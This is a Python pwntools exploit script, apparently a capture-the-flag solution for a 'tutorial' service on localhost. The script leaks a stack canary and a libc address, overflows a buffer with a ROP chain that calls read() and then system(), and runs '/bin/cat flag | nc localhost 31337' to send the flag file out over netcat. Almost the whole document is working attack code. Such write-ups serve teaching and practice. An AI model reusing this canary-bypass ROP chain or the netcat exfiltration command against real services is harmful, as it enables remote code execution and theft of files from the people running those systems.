# :) 바이너리 안에 없는 가젯은 libc에서 찾자
from pwn import *
# Connection to the target service on the loopback interface, port 1233.
# Every helper below reads and writes through this module-level global.
s = remote("localhost",1233)
# The libc copy shipped with the challenge. All libc symbol lookups and the
# hard-coded libc offsets further down are relative to THIS file; they are
# only meaningful for this exact build.
libc = ELF("./libc")
# The target binary; used below for elf.plt['read'] and elf.bss().
elf = ELF("./tutorial")
def manual():
    """Select menu option 1 ("manual") at the service's ">" prompt.

    Waits for the prompt on the module-level connection ``s`` (the prompt
    text itself is discarded) and then sends "1" followed by a newline.
    """
    # recvuntil(">") + sendline("1"), expressed as a single pwntools call.
    s.sendlineafter(">", "1")
def practice(content):
    """Select menu option 2 ("practice") and submit *content* as the input.

    Waits for the ">" prompt on the module-level connection ``s``, sends
    "2", then waits for the "Time to test your exploit..." banner before
    sending *content* terminated by a newline (``sendline``).

    Args:
        content: the bytes/str handed to the service as the practice input.
    """
    s.sendlineafter(">", "2")
    s.sendlineafter("Time to test your exploit...", content)
def quit():
    """Select menu option 3 ("quit") at the service's ">" prompt.

    Uses the module-level connection ``s``. Note that this shadows the
    builtin ``quit``; the name is kept because it is part of the script's
    interface. It is not called anywhere in the visible part of the script.
    """
    s.sendlineafter(">", "3")
# --- Stage 1: leak the value the script treats as the stack canary -----------
# Submit 311 bytes of filler through option 2. The service evidently echoes
# the input back (the script reads it again below); the 8 bytes following the
# echoed 312 bytes are interpreted as the canary.
# NOTE(review): the 312-byte echo length versus the 311 bytes sent is assumed
# from the recv() sizes below, not verified here — confirm against the
# service's actual output format.
practice("A"*311)
s.recvuntil(">")
print s.recv(312)
canary = u64(s.recv(8))
print "canary : " + hex(canary)
# --- Stage 2: leak a libc address via the "Reference:" line ------------------
manual()
s.recvuntil("Reference:")
# 14 characters (presumably "0x" plus 12 hex digits) are parsed as an address.
# The "+ 1280" (0x500) is a hard-coded distance from the printed value to
# puts in THIS libc build; with any other libc the base below is silently
# wrong. Nothing validates the parsed value.
puts_libc = int(s.recv(14),16) + 1280
print "puts_libc : " + hex(puts_libc)
# Resolve the libc base and the addresses used below against the ./libc copy.
libc_base = puts_libc - libc.symbols['puts']
system = libc_base + libc.symbols['system']
# 0xf02a4 is another hard-coded, build-specific libc offset (the name
# suggests a "one-gadget" address). It is printed but never used by the
# payload below.
one_shot = libc_base + 0xf02a4
# Also computed but unused by the payload: the chain reads its own command
# string into .bss instead of pointing at libc's "/bin/sh".
bin_sh = libc_base + next(libc.search("/bin/sh\0"))
print "libc_base : " + hex(libc_base)
print "system : " + hex(system)
print "one_shot : " + hex(one_shot)
print "bin_sh : " + hex(bin_sh)
# --- Gadget addresses --------------------------------------------------------
# pop_rdi, pop_rbp and pop_rsi_r15 are absolute addresses inside ./tutorial,
# so the binary is assumed to be mapped at a fixed base. pop_rdx is taken from
# libc (see the note at the top of the file: gadgets missing from the binary
# are looked up in libc). The names are the author's labels for these
# addresses; nothing in this script checks what instructions live there.
pop_rdi = 0x004012e3
pop_rbp = 0x00400cd5   # defined but not used by the payload below
pop_rsi_r15 = 0x004012e1
pop_rdx = libc_base + 0x00001b92
# Command string the chain reads into .bss and then passes to system(). Its
# length is what read() is told to expect (len(cmd) below), and it is sent
# with send() rather than sendline() so no trailing newline is included.
cmd = "/bin/cat flag | nc localhost 31337"
# --- Stage 3: build the overflow payload -------------------------------------
pay = "A"*312          # filler up to the canary slot (312 = 311 leaked + 1)
pay += p64(canary)     # put the leaked value back so the canary check passes
pay += "B"*8           # saved rbp; its value is irrelevant to the chain
# read(4, elf.bss()+0x10, len(cmd)) — fd 4 is presumably the client
# connection descriptor on the server side; confirm for the target.
pay += p64(pop_rdi)
pay += p64(4)
pay += p64(pop_rsi_r15)
pay += p64(elf.bss()+0x10)
pay += p64(0)          # filler for the r15 half of the pop rsi; pop r15 gadget
pay += p64(pop_rdx)
pay += p64(len(cmd))
pay += p64(elf.plt['read'])
# system(elf.bss()+0x10) — the buffer the previous read() filled.
pay += p64(pop_rdi)
pay += p64(elf.bss()+0x10)
pay += p64(system)
practice(pay)
# Exactly len(cmd) bytes, consumed by the read() in the chain (see the
# rdx value above); a sendline() here would add a byte the read() never takes.
s.send(cmd)
s.interactive()